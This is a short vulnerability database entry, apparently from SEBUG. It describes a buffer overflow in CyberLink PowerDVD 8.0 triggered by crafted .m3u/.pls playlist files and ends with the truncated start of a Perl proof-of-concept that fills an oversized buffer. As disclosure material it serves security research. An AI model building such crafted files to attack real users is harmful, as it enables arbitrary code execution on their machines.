BUGTRAQ ID: 30341
CNCAN ID:CNCAN-2008072307
PowerDVD是一款支持DVD播放的媒体程序。
PowerDVD处理'.m3u'/'.pls'文件存在缓冲区溢出,远程攻击者可以利用漏洞以应用程序权限执行任意指令。
构建恶意的'.m3u'/'.pls'文件,诱使用户访问,可触发此漏洞。
PowerDVD '.m3u'/'.pls'文件多个缓冲区溢出漏洞
Published:2008-07-23
Vulnerable:
CyberLink PowerDVD 8.0
Discription:
<*References
漏洞提供者*>
Gjoko 'LiquidWorm' Krstic
SEBUG Solution:
Exploit:
[www.sebug.net]
The following procedures (methods) may contain something offensive,they are only for security researches and teaching , at your own risk!
The following procedures (methods) may contain something offensive,they are only for security researches and teaching , at your own risk!
#!/usr/bin/perl # # CyberLink PowerDVD <= 8.0 Crafted PLS/M3U Playlist File Buffer Overflow Exploit # Coded by Gjoko "LiquidWorm" Krstic # liquidworm [At] gmail.com # http://www.zeroscience.org # $buffer = "J" x 52000
// Sebug.net [ 2008-07-23 ]